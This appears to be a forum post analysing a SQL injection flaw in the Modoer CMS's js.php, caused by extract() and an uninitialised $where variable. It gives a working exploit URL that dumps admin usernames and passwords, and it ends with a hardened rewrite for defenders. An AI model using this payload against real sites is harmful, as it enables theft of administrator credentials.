Author: my5t3ry
A few days ago I saw fjhgx post a Modoer injection vulnerability in the forum. I was bored and ran through the code. Let's take a look at it.
First, look at lines 76-94 of common.inc.php:

```php
$pattern_arr = $replace_arr = array();
if (!defined('IN_ADMIN')) {
    $pattern_arr = array("/union/i", "/select/i", "/update/i", "/outfile/i", "/or/i");
    $replace_arr = array('&nbsp;union&nbsp;', '&nbsp;select&nbsp;', '&nbsp;update&nbsp;',
                         '&nbsp;outfile&nbsp;', '&nbsp;or&nbsp;');
    $_POST   = strip_sql($_POST);
    $_GET    = strip_sql($_GET);
    $_COOKIE = strip_sql($_COOKIE);
    unset($pattern_arr, $replace_arr);
}

define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
if (!MAGIC_QUOTES_GPC) {
    $_POST   = add_slashes($_POST);
    $_GET    = add_slashes($_GET);
    $_COOKIE = add_slashes($_COOKIE);
    $_FILES && $_FILES = add_slashes($_FILES);
}
// every POST/GET key becomes a global variable, even with register_globals = off
if (!empty($_POST)) extract($_POST, EXTR_SKIP);
if (!empty($_GET))  extract($_GET, EXTR_SKIP);
```
Even with register_globals = off, this code registers the request variables for us. Next, the strip_sql and add_slashes functions:

```php
function strip_sql($string) {
    global $pattern_arr, $replace_arr;
    // recurse into arrays; otherwise apply the keyword-mangling regexes
    return is_array($string) ? array_map('strip_sql', $string) : preg_replace($pattern_arr, $replace_arr, $string);
}

function add_slashes($string) {
    if (is_array($string))
        foreach ($string as $key => $val) $string[$key] = add_slashes($val);
    else
        $string = is_string($string) ? addslashes($string) : $string;
    return $string;
}
```
Now look at lines 63-109 of js.php:

```php
} else {

    if ($jssort != 'shop' && $jssort != 'review') {
        exit("document.write('undefined call type.');");
    }

    $sort = $jssort == 'shop' ? (isset($sort) && $sort > 0 && $sort <= 3 ? $sort : 0) : (isset($sort) && $sort > 0 && $sort <= 3 ? $sort : 0);
    $num = isset($num) && intval(trim($num)) >= 1 ? intval(trim($num)) : 10;
    $intercept = isset($intercept) && $intercept > 0 ? intval($intercept) : 0;
    $openwindow = isset($openwindow) && $openwindow > 0 ? 1 : 0;
    $pcdname = isset($pcdname) && $pcdname > 0 ? 1 : 0;

    if (!$sort) {
        exit("document.write('no display type is selected.');");
    }

    $cachename = 'js_' . md5($jssort . $panels . $sort . $num);
    $cachefile = MUDDER_CACHEDIR . 'cache_' . $cachename . '.php';

    if (!@include($cachefile) || $timestamp - $_createtime_js > $cachelife) {

        $panels = $panels ? explode('_', $panels) : '';
        if ($panels && is_array($panels)) foreach ($panels as $panel) {
            $where .= ($where ? ' OR ' : '') . "classcode like '{$panel}__'";
        }
        if ($jssort == 'shop') {
            $select = "sid AS shopid, shopname, subname, classcode, reviews";
            $from = "{$dbpre}shops";
            $where = "status = 1" . ($where ? ' AND ' . $where : ''); // $where is used but never initialised
        } else {
            $select = "a.rid AS reviewid, a.content, b.shopname, b.subname, b.classcode, b.reviews";
            $from = "{$dbpre}reviews a LEFT JOIN {$dbpre}shops b ON (a.shopid = b.sid)";
            $where = "a.status = 1 AND b.status = 1" . ($where ? ' AND ' . $where : '');
        }
        if ($sort == 1) {
            $orderby = $jssort == 'shop' ? "reviews DESC" : "a.posttime DESC";
        } elseif ($sort == 2) {
            $orderby = $jssort == 'shop' ? "sumreview DESC" : "a.flower DESC";
        } elseif ($sort == 3) {
            $orderby = $jssort == 'shop' ? "addtime DESC" : "a.respond DESC";
        }

        $datalist = array();
        $query = $db->query("SELECT $select FROM $from WHERE $where ORDER BY $orderby LIMIT $num");
        while ($result = $db->fetch_array($query)) {
            $datalist[] = $result;
        }
```
$where is never initialised in this code, so the value that extract($_GET, EXTR_SKIP) registered from the query string is appended straight into the WHERE clause. That is the vulnerability.
Exp: js.php?sort=1&jssort=shop&where=%201=2%20/**/union/**/select/**/1,adminname,password,4,5/**/from/**/modoer_admin%23
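To make the root cause concrete from the defender's side, here is an added example (not Modoer's own code) that builds the shop WHERE clause two ways on a constructed request array: the uninitialised-$where shape from js.php, and a version that initialises $where, reads its inputs explicitly and only accepts panel codes matching a strict pattern (the allowed code format is an assumption).

```php
<?php
// Added example, not Modoer's code. The request array at the bottom is constructed.

// Vulnerable shape, as in js.php: extract() registers every request key as a
// variable. EXTR_SKIP only protects variables that already exist, and $where
// does not exist yet, so the attacker's ?where= value becomes the initial $where.
function build_where_vulnerable(array $get) {
    extract($get, EXTR_SKIP);
    if (!empty($panels)) {
        foreach (explode('_', $panels) as $panel) {
            $where .= ($where ? ' OR ' : '') . "classcode like '{$panel}__'";
        }
    }
    return 'status = 1' . ($where ? ' AND ' . $where : '');
}

// Hardened shape: no extract(), $where initialised before use, and each panel
// code must match an assumed format (1-8 letters or digits) before it is used.
function build_where_fixed(array $get) {
    $where  = '';
    $panels = isset($get['panels']) ? (string)$get['panels'] : '';
    $parts  = array();
    foreach (array_filter(explode('_', $panels)) as $panel) {
        if (!preg_match('/^[A-Za-z0-9]{1,8}$/', $panel)) {
            continue;   // anything that is not a plain code is dropped, not escaped
        }
        $parts[] = "classcode like '" . addslashes($panel) . "__'";
    }
    if ($parts) {
        $where = implode(' OR ', $parts);
    }
    return 'status = 1' . ($where ? ' AND (' . $where . ')' : '');
}

// Constructed request: a legitimate panel list plus an injected ?where= parameter.
$request = array(
    'sort'   => '1',
    'jssort' => 'shop',
    'panels' => 'a1_b2',
    'where'  => "1=2 union select 1,adminname,password,4,5 from modoer_admin#",
);
echo "vulnerable: ", build_where_vulnerable($request), "\n";
echo "fixed:      ", build_where_fixed($request), "\n";
```

In the vulnerable path the injected text is prepended to the clause before the panel conditions are appended; in the fixed path it is simply never read, and a malformed panel code such as `x' OR 1=1--` is discarded by the pattern check.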